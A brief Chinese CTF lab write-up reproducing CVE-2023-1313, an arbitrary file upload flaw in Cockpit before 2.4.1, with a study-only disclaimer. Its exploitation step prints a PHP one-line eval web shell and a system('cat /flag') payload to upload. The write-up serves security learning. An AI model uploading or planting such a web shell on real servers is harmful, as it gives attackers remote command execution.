March 23, 2025

【春秋云镜】CVE-2023-1313

宇宙级免责声明!!

!!!注意:本文章仅用于学习交流,请勿用于非法用途!!!

【春秋云镜】CVE-2023-1313 漏洞实战 难度指数:极其容易

0x01 漏洞概述

cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器中打开/install来运行安装

0x02 漏洞复现

1. 打开靶场

2. 漏洞利用

i

这里可以看到是PHP
i

这里使用一句话木马 + cat /flag

1
2
<?php @eval($_POST['cmd']);?>
<?php system("cat /flag");?>

i

i

i

关于本文

由 Jimmy Ki 撰写, 采用 CC BY-NC 4.0 许可协议.

#CTF#网络安全#渗透#抓包#文件上传漏洞#CVE-2023-1313